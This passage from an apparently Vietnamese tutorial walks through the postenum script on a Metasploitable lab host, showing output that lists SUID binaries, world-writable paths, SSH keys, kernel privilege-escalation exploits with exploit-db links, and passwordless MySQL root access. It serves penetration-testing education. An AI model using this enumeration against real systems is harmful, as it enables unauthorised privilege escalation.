-rw-r--r-- 1 user user 2928 Mar 31  2010 /home/user/.bashrc
-rw-r--r-- 1 user user 220 Mar 31  2010 /home/user/.bash_logout
-rw------- 1 root root 4174 May 14  2012 /home/msfadmin/.mysql_history
-rw-r--r-- 1 msfadmin msfadmin 1598 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/bin/.htaccess.txt
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Sandbox/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 1436 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Sandbox/.changes
-rw-r--r-- 1 msfadmin msfadmin 210 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/.htpasswd
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Main/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 3657 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Main/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Know/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 3489 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Know/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/TWiki/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 4189 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/TWiki/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/_default/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 683 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/_default/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Trash/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 767 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Trash/.changes
-rwx------ 1 msfadmin msfadmin 4 May 20  2012 /home/msfadmin/.rhosts
-rw-r--r-- 1 msfadmin msfadmin 586 Mar 16  2010 /home/msfadmin/.profile
-rw-r--r-- 1 msfadmin msfadmin 0 May  7  2010 /home/msfadmin/.sudo_as_admin_successful
-rw------- 1 msfadmin msfadmin 0 Jun  6  2018 /home/msfadmin/.Xauthority
-rw-rw-rw- 1 root daemon 1 Aug  8  2018 /lib/tls/i686/cmov/.4tJrYgzxS.so
-rw-rw-rw- 1 root daemon 1 Jun 19 12:56 /lib/tls/i686/cmov/.CsUPZ8Z0.so
-rw-r--r-- 1 root root 5 Dec  5  2007 /usr/share/python-support/antlr/.version
-rw-r--r-- 1 root root 2 Aug 29  2007 /usr/share/python-support/python-gnupginterface/.version
-rw-r--r-- 1 root root 0 May 20  2012 /usr/lib/firefox-3.6.17/.autoreg
-rw-r--r-- 1 root root 1258 Mar 10  2008 /usr/lib/jvm/.java-gcj.jinfo
-rw------- 1 root root 215 Jun 19 13:46 /root/.mysql_history
-rwx------ 1 root root 4 May 20  2012 /root/.rhosts
-rw-r--r-- 1 root root 141 Oct 20  2007 /root/.profile
-rw-r--r-- 1 root root 173 Jun 19  2019 /root/.bash_history
-rw------- 1 root root 324 Jun 19 13:21 /root/.Xauthority
-rw-r--r-- 1 root root 2227 Oct 20  2007 /root/.bashrc
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.monthly/.placeholder
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.weekly/.placeholder
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.d/.placeholder
-rw-r--r-- 1 root root 586 Apr 14  2008 /etc/skel/.profile
-rw-r--r-- 1 root root 2928 Apr 14  2008 /etc/skel/.bashrc
-rw-r--r-- 1 root root 220 Apr 14  2008 /etc/skel/.bash_logout
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.daily/.placeholder
-rw-r--r-- 1 root root 102 Apr  8  2008 /etc/cron.hourly/.placeholder
-rw------- 1 root root 0 Mar 16  2010 /etc/.pwd.lock
-rw-r--r-- 1 root root 0 Jun 19 13:20 /dev/.initramfs-tools
-rw------- 1 postgres postgres 34 Jun 19 13:21 /var/run/postgresql/.s.PGSQL.5432.lock
-rw-r--r-- 1 root root 34 May 13  2012 /var/lib/python-support/python2.5/.path
-rw------- 1 postgres postgres 131 Mar 30  2010 /var/lib/postgresql/.bash_history
-rwxr-xr-x 1 www-data www-data 497 Sep  8  2010 /var/www/dvwa/.htaccess
-rwxr-xr-x 1 www-data www-data 174 Apr 11  2011 /var/www/mutillidae/.buildpath
-rwxr-xr-x 1 www-data www-data 712 Apr 11  2011 /var/www/mutillidae/.project
-rwxr-xr-x 1 www-data www-data 427 May 14  2012 /var/www/mutillidae/.htaccess
-rw-r--r-- 1 www-data www-data 118 Dec  9  2008 /var/www/phpMyAdmin/libraries/.htaccess
-rwxrwxr-x 1 www-data www-data 66 Jan 22  2005 /var/www/tikiwiki-old/modules/cache/.htaccess
-rwxrwxr-x 1 www-data www-data 66 Jan 19  2005 /var/www/tikiwiki-old/templates_c/.htaccess
-rw-r--r-- 1 www-data www-data 1598 Jun  1  2002 /var/www/twiki/bin/.htaccess.txt
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/Sandbox/.mailnotify
-rwxrwxrwx 1 www-data www-data 1436 Feb  1  2003 /var/www/twiki/data/Sandbox/.changes
-rw-r--r-- 1 www-data www-data 210 Jan 11  2003 /var/www/twiki/data/.htpasswd
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/Main/.mailnotify
-rwxrwxrwx 1 www-data www-data 3653 Apr 16  2010 /var/www/twiki/data/Main/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/Know/.mailnotify
-rwxrwxrwx 1 www-data www-data 3489 Jan 30  2003 /var/www/twiki/data/Know/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/TWiki/.mailnotify
-rwxrwxrwx 1 www-data www-data 4189 Feb  1  2003 /var/www/twiki/data/TWiki/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/_default/.mailnotify
-rwxrwxrwx 1 www-data www-data 683 Jan 30  2003 /var/www/twiki/data/_default/.changes
-rwxrwxrwx 1 www-data www-data 9 Oct 25  2001 /var/www/twiki/data/Trash/.mailnotify
-rwxrwxrwx 1 www-data www-data 767 Jan 25  2003 /var/www/twiki/data/Trash/.changes
-rw------- 1 www-data www-data 4275 Jun 19  2019 /var/www/.bash_history
-rw-rw-r-- 1 www-data www-data 66 Jan 22  2005 /var/www/tikiwiki/modules/cache/.htaccess
-rw-rw-r-- 1 www-data www-data 66 Jan 19  2005 /var/www/tikiwiki/templates_c/.htaccess
-r--r--r-- 1 root root 11 Jun 19 13:21 /tmp/.X0-lock

[+] - Check for clear-text password on /home/*
[x] Clear text password:
-rwxr-xr-x 1 msfadmin msfadmin 6936 Apr 16  2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/bin/passwd

[+] - The most interesting ssh files /
[x] SSH files:
-rw-r--r-- 1 root root 442 May 20  2012 /root/.ssh/known_hosts
-rw-r--r-- 1 root root 405 May 17  2010 /root/.ssh/authorized_keys

[+] - Check sticky bits, SUID and SGID
[x] SUID - 4000:
-rwsr-xr-x 1 root root 63584 Apr 14  2008 /bin/umount
-rwsr-xr-- 1 root fuse 20056 Feb 26  2008 /bin/fusermount
-rwsr-xr-x 1 root root 25540 Apr  2  2008 /bin/su
-rwsr-xr-x 1 root root 81368 Apr 14  2008 /bin/mount
-rwsr-xr-x 1 root root 30856 Dec 10  2007 /bin/ping
-rwsr-xr-x 1 root root 26684 Dec 10  2007 /bin/ping6
-rwsr-xr-x 1 root root 65520 Dec  2  2008 /sbin/mount.nfs
-rwsr-xr-- 1 root dhcp 2960 Apr  2  2008 /lib/dhcp3-client/call-dhclient-script
-rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudoedit
-rwsr-sr-x 1 root root 7460 Jun 25  2008 /usr/bin/X
-rwsr-xr-x 1 root root 8524 Nov 22  2007 /usr/bin/netkit-rsh
-rwsr-xr-x 1 root root 37360 Apr  2  2008 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 12296 Dec 10  2007 /usr/bin/traceroute6.iputils
-rwsr-xr-x 2 root root 107776 Feb 25  2008 /usr/bin/sudo
-rwsr-xr-x 1 root root 12020 Nov 22  2007 /usr/bin/netkit-rlogin
-rwsr-xr-x 1 root root 11048 Dec 10  2007 /usr/bin/arping
-rwsr-sr-x 1 daemon daemon 38464 Feb 20  2007 /usr/bin/at
-rwsr-xr-x 1 root root 19144 Apr  2  2008 /usr/bin/newgrp
-rwsr-xr-x 1 root root 28624 Apr  2  2008 /usr/bin/chfn
-rwsr-xr-x 1 root root 780676 Apr  8  2008 /usr/bin/nmap
-rwsr-xr-x 1 root root 23952 Apr  2  2008 /usr/bin/chsh
-rwsr-xr-x 1 root root 15952 Nov 22  2007 /usr/bin/netkit-rcp
-rwsr-xr-x 1 root root 29104 Apr  2  2008 /usr/bin/passwd
-rwsr-xr-x 1 root root 46084 Mar 31  2008 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27  2008 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 269256 Oct  4  2007 /usr/sbin/pppd
-rwsr-xr-- 1 root telnetd 6040 Dec 17  2006 /usr/lib/telnetlogin
-rwsr-xr-- 1 root www-data 10276 Mar  9  2010 /usr/lib/apache2/suexec
-rwsr-xr-x 1 root root 4524 Nov  5  2007 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 165748 Apr  6  2008 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9624 Aug 17  2009 /usr/lib/pt_chown

[x] SGID - 2000:
-rwxr-sr-x 1 root shadow 19584 Apr  9  2008 /sbin/unix_chkpwd
-rwxr-sr-x 1 root utmp 3192 Apr 22  2008 /usr/bin/Eterm
-rwsr-sr-x 1 root root 7460 Jun 25  2008 /usr/bin/X
-rwxr-sr-x 1 root tty 8192 Dec 12  2007 /usr/bin/bsd-write
-rwxr-sr-x 1 root ssh 76580 Apr  6  2008 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 30508 Mar  8  2008 /usr/bin/mlocate
-rwxr-sr-x 1 root crontab 26928 Apr  8  2008 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 37904 Apr  2  2008 /usr/bin/chage
-rwxr-sr-x 1 root utmp 308228 Oct 23  2007 /usr/bin/screen
-rwxr-sr-x 1 root shadow 16424 Apr  2  2008 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 38464 Feb 20  2007 /usr/bin/at
-rwxr-sr-x 1 root utmp 306996 Jan  2  2009 /usr/bin/xterm
-rwxr-sr-x 1 root tty 9960 Apr 14  2008 /usr/bin/wall
-rwsr-sr-x 1 libuuid libuuid 12336 Mar 27  2008 /usr/sbin/uuidd
-r-xr-sr-x 1 root postdrop 10312 Apr 18  2008 /usr/sbin/postqueue
-r-xr-sr-x 1 root postdrop 10036 Apr 18  2008 /usr/sbin/postdrop

[x] Sticky bit for folders - 1000:
drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm
drwxrwxr-t 2 root postgres 4096 May  8  2010 /var/log/postgresql
drwxrwxrwt 3 root root 60 Jun 19 13:21 /var/lock
drwx-wx-wt 2 root root 118784 Jun 19 13:29 /var/lib/php5
drwxrwxrwt 2 root root 4096 Jun 19 13:35 /var/tmp
drwxrwxrwt 3 root root 4096 Jun 19  2019 /var/www/dav
drwxrwx--T 2 daemon daemon 4096 Mar 16  2010 /var/spool/cron/atjobs
drwxrwx--T 2 daemon daemon 4096 Feb 20  2007 /var/spool/cron/atspool
drwx-wx--T 2 root crontab 4096 Apr  8  2008 /var/spool/cron/crontabs
drwx-wx--T 2 postfix postdrop 4096 May  7  2010 /var/spool/postfix/maildrop
drwxrwxrwt 4 root root 4096 Jun 19 13:23 /tmp
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.X11-unix

[+] - Check for written and executable places
[x] World-writable folders - 222:
drwxrwxrwt 2 root root 40 Jun 19 13:21 /dev/shm
drwxrwxrwt 3 root root 60 Jun 19 13:21 /var/lock
drwx-wx-wt 2 root root 118784 Jun 19 13:29 /var/lib/php5
drwxrwxrwt 2 root root 4096 Jun 19 13:35 /var/tmp
drwxrwxrwt 3 root root 4096 Jun 19  2019 /var/www/dav
drwxrwxrwx 2 www-data www-data 4096 Feb  1  2003 /var/www/twiki/data/Sandbox
drwxrwxrwx 2 www-data www-data 4096 Apr 16  2010 /var/www/twiki/data/Main
drwxrwxrwx 2 www-data www-data 4096 Jan 30  2003 /var/www/twiki/data/Know
drwxrwxrwx 2 www-data www-data 16384 Feb  1  2003 /var/www/twiki/data/TWiki
drwxrwxrwx 2 www-data www-data 4096 Jan 30  2003 /var/www/twiki/data/_default
drwxrwxrwx 2 www-data www-data 4096 Feb  1  2003 /var/www/twiki/data/Trash
drwxrwxrwx 2 www-data www-data 4096 Apr 21  2002 /var/www/twiki/pub/Sandbox
drwxrwxrwx 2 www-data www-data 4096 Apr  7  2002 /var/www/twiki/pub/Main
drwxrwxrwx 3 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/Know
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/Know/IncorrectDllVersionW32PTH10DLL
drwxrwxrwx 8 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki
drwxrwxrwx 2 www-data www-data 4096 Jan 21  2003 /var/www/twiki/pub/TWiki/TWikiDocGraphics
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/TWikiTemplates
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/TWikiLogos
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/PreviewBackground
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/FileAttachment
drwxrwxrwx 2 www-data www-data 4096 Nov 18  2002 /var/www/twiki/pub/TWiki/WabiSabi
drwxrwxrwx 2 www-data www-data 4096 Dec  4  2001 /var/www/twiki/pub/Trash
drwxrwxrwx 2 www-data www-data 4096 Feb  1  2003 /var/www/twiki/pub/icn
drwxrwxrwt 4 root root 4096 Jun 19 13:23 /tmp
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Jun 19 13:21 /tmp/.X11-unix

[x] World-writable files - 0002:
304795    4 -rw-rw-rw-   1 root     daemon          1 Aug  8  2018 /lib/tls/i686/cmov/.4tJrYgzxS.so
304796    4 -rw-rw-rw-   1 root     daemon          1 Jun 19 12:56 /lib/tls/i686/cmov/.CsUPZ8Z0.so
 11265    0 srw-rw-rw-   1 root     root            0 Jun 19 13:21 /dev/log
 10037    0 drwxrwxrwt   2 root     root           40 Jun 19 13:21 /dev/shm
  6130    0 crw-rw-rw-   1 root     root              Mar 16  2010 /dev/null
  5082    0 crw-rw-rw-   1 root     tty               Jun 19 13:20 /dev/ttyzf

...

[+] - Check for readable logfiles owned by root
[x] World-readable logfiles - 0004:
-rw-r--r-- 1 root root 88953 Jul  5  2018 /var/log/dpkg.log
-rw-r--r-- 1 root root 5376 Jun 19 13:22 /var/log/wtmp
-rw-r--r-- 1 root root 96 Mar 16  2010 /var/log/installer/lsb-release
-rw-r--r-- 1 root root 0 Mar 16  2010 /var/log/installer/initial-status.gz
-rw-r--r-- 1 root root 58721 Mar 16  2010 /var/log/installer/status
-rw-r--r-- 1 root root 46866 Mar 16  2010 /var/log/installer/hardware-summary
-rw-r--r-- 1 root adm 16950 Jun 19 13:41 /var/log/dmesg.0
-rw-r--r-- 1 root root 292114 Jun 19 13:20 /var/log/udev
-rw-r--r-- 1 root adm 6419 Jun 19 13:52 /var/log/dmesg.4.gz
-rw-r--r-- 1 root adm 6405 Jun 19 13:21 /var/log/dmesg.3.gz
-rw-r--r-- 1 root news 0 Mar 16  2010 /var/log/news/news.crit
-rw-r--r-- 1 root news 0 Mar 16  2010 /var/log/news/news.notice
-rw-r--r-- 1 root news 0 Mar 16  2010 /var/log/news/news.err
-rw-r--r-- 1 root root 0 May 20  2012 /var/log/boot
-rw-r--r-- 1 root adm 6446 Jun 19 13:20 /var/log/dmesg.2.gz
-rw-r--r-- 1 root root 0 May 20  2012 /var/log/btmp
-rw-r--r-- 1 root adm 6414 Jun 19 13:21 /var/log/dmesg.1.gz
-rw-r--r-- 1 root root 292292 Jun 19 13:22 /var/log/lastlog
-rw-r--r-- 1 root adm 16992 Jun 19 13:21 /var/log/dmesg

[+] - List NFS shares and permisisons
[x] NFS:
-rw-r--r-- 1 root root 367 May 13  2012 /etc/exports

Nó bắt đầu bằng cách kiểm tra bất kỳ tệp thú vị nào nằm trong các thư mục máy chủ web tiêu chuẩn. Tiếp theo, nó tìm kiếm các tệp ẩn, tệp SSH và bất kỳ mật khẩu văn bản rõ ràng nào trong các thư mục chính. Sau đó, nó sẽ kiểm tra SUID, SGID và các bit dính. Cuối cùng, nó tìm kiếm bất kỳ thư mục có thể ghi và thực thi và bao gồm bất kỳ cổ phiếu NFS nào có trên hệ thống.

Giai đoạn 9 Khai thác thông tin hệ điều hành & nhân

Tùy chọn tiếp theo chúng tôi sẽ xem xét sẽ cung cấp cho thông tin liên quan đến hệ điều hành và sẽ đề xuất mọi khai thác kernel có liên quan có khả năng được sử dụng để leo thang đặc quyền và lấy quyền root. Sử dụng công tắc -o cho việc này:

target:/var/tmp$ ./postenum.sh -o

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] OPERATING SYSTEM
[+] - Check current user and group information
[x] The current user and group information:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[x] The current user:
www-data

[+] - Check distribution type and version number
[x] The distribution type and version:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"

[+] - Check kernel version
[x] Kernel version and (32-bit/64-bit):
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

[x] Kernel version and gcc version used to compile the kernel:
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008

[+] - Exploits
[x] Possible exploits for linux kernel 2.6.24:
Listing the most popular exploits for kernel 4*
------------------------------------------------------
 Linux Kernel 2.6.39 < 3.2.2 Gentoo / Ubuntu x86-x64 Mempodipper(1) - https://www.exploit-db.com/exploits/18411
 Linux Kernel 2.6.39 < 3.2.2 x86-x64 Mempodipper(2) - https://www.exploit-db.com/exploits/35161
 Linux Kernel 3.7.6 (RedHat x86/x64) - https://www.exploit-db.com/exploits/27297
 Linux Kernel 3.13 < 3.19 Ubuntu 12.04/14.04/14.10/15.04 - https://www.exploit-db.com/exploits/37292
 Linux Kernel 3.13 SGID - https://www.exploit-db.com/exploits/33824
 Linux Kernel 3.13.1 (Metasploit) - https://www.exploit-db.com/exploits/40503
 Linux Kernel 3.14.5 (CentOS 7 / RHEL) - https://www.exploit-db.com/exploits/35370
 Linux Kernel 3.x (Ubuntu 14.04/Mint 17.3/Fedora 22) https://www.exploit-db.com/exploits/41999
 Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - https://www.exploit-db.com/exploits/44298
 Linux kernel < 4.10.15 Race Condition - https://www.exploit-db.com/exploits/43345
 Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - https://www.exploit-db.com/exploits/45010
 Linux Kernel 2.6.22 < 3.9 Dirty Cow - https://www.exploit-db.com/exploits/40839
 Linux Kernel 2.6.22 < 3.9 Dirty Cow (x86-x64) - https://www.exploit-db.com/exploits/40616

The most specific exploits for your kernel 2.6.24
------------------------------------------------------
Nothing extract from exploits, for kernel 2.6.24

Đầu tiên, nó sẽ cung cấp cho chúng tôi thông tin người dùng và nhóm hiện tại. Sau đó, nó sẽ hiển thị cho chúng tôi tên phân phối và số phát hành, tiếp theo là phiên bản kernel và thông tin về cách kernel được biên dịch. Tiếp theo, nó liệt kê các khai thác có thể dựa trên phiên bản kernel cùng với các liên kết đến các trang Cơ sở dữ liệu khai thác của họ .

Cuối cùng, có một tùy chọn cuối cùng cho Postenum – khả năng chạy tất cả các tùy chọn này cùng một lúc. Sử dụng công tắc -a cho cái này:

target:/var/tmp$ ./postenum.sh -a

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] OPERATING SYSTEM
[+] - Check current user and group information
[x] The current user and group information:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[x] The current user:
www-data

[+] - Check distribution type and version number
[x] The distribution type and version:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"

[+] - Check kernel version
[x] Kernel version and (32-bit/64-bit):
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

[x] Kernel version and gcc version used to compile the kernel:
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008

[+] - Exploits
[x] Possible exploits for linux kernel 2.6.24:
Listing the most popular exploits for kernel 4*
------------------------------------------------------
 Linux Kernel 2.6.39 < 3.2.2 Gentoo / Ubuntu x86-x64 Mempodipper(1) - https://www.exploit-db.com/exploits/18411
 Linux Kernel 2.6.39 < 3.2.2 x86-x64 Mempodipper(2) - https://www.exploit-db.com/exploits/35161
 Linux Kernel 3.7.6 (RedHat x86/x64) - https://www.exploit-db.com/exploits/27297
 Linux Kernel 3.13 < 3.19 Ubuntu 12.04/14.04/14.10/15.04 - https://www.exploit-db.com/exploits/37292
 Linux Kernel 3.13 SGID - https://www.exploit-db.com/exploits/33824
 Linux Kernel 3.13.1 (Metasploit) - https://www.exploit-db.com/exploits/40503
 Linux Kernel 3.14.5 (CentOS 7 / RHEL) - https://www.exploit-db.com/exploits/35370
 Linux Kernel 3.x (Ubuntu 14.04/Mint 17.3/Fedora 22) https://www.exploit-db.com/exploits/41999
 Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - https://www.exploit-db.com/exploits/44298
 Linux kernel < 4.10.15 Race Condition - https://www.exploit-db.com/exploits/43345
 Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - https://www.exploit-db.com/exploits/45010
 Linux Kernel 2.6.22 < 3.9 Dirty Cow - https://www.exploit-db.com/exploits/40839
 Linux Kernel 2.6.22 < 3.9 Dirty Cow (x86-x64) - https://www.exploit-db.com/exploits/40616

The most specific exploits for your kernel 2.6.24
------------------------------------------------------
Nothing extract from exploits, for kernel 2.6.24

[-] APPS and SERVICES
[+] - Check jobs scheduled
[x] Search on cron in /etc:
drwxr-xr-x  2 root     root     4096 Jul  5  2018 cron.d
drwxr-xr-x  2 root     root     4096 Apr 28  2010 cron.daily
drwxr-xr-x  2 root     root     4096 Mar 16  2010 cron.hourly
drwxr-xr-x  2 root     root     4096 Apr 28  2010 cron.monthly
drwxr-xr-x  2 root     root     4096 Mar 16  2010 cron.weekly
-rw-r--r--  1 root     root      724 Apr  8  2008 crontab

[x] List /etc/cron.d/
-rw-r--r-- 1 root root  507 May  3  2012 php5
-rw-r--r-- 1 root root 1323 Mar 31  2008 postgresql-common

...

[+] - List all available shells
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen

[-] TRYING ACCESS
[+] - Check for some methods for extract creds and get access as root
[x] Connect to MYSQL as root and non-pass:
[/] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin  Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license

Server version          5.0.51a-3ubuntu5
Protocol version        10
Connection              Localhost via UNIX socket
UNIX socket             /var/run/mysqld/mysqld.sock
Uptime:                 41 min 2 sec

Threads: 2  Questions: 447  Slow queries: 0  Opens: 420  Flush tables: 1  Open tables: 64  Queries per second avg: 0.182

Hãy lưu ý, điều này có thể mất một chút thời gian vì nó chạy tất cả các tùy chọn và thu thập rất nhiều thông tin.

Để lại một bình luận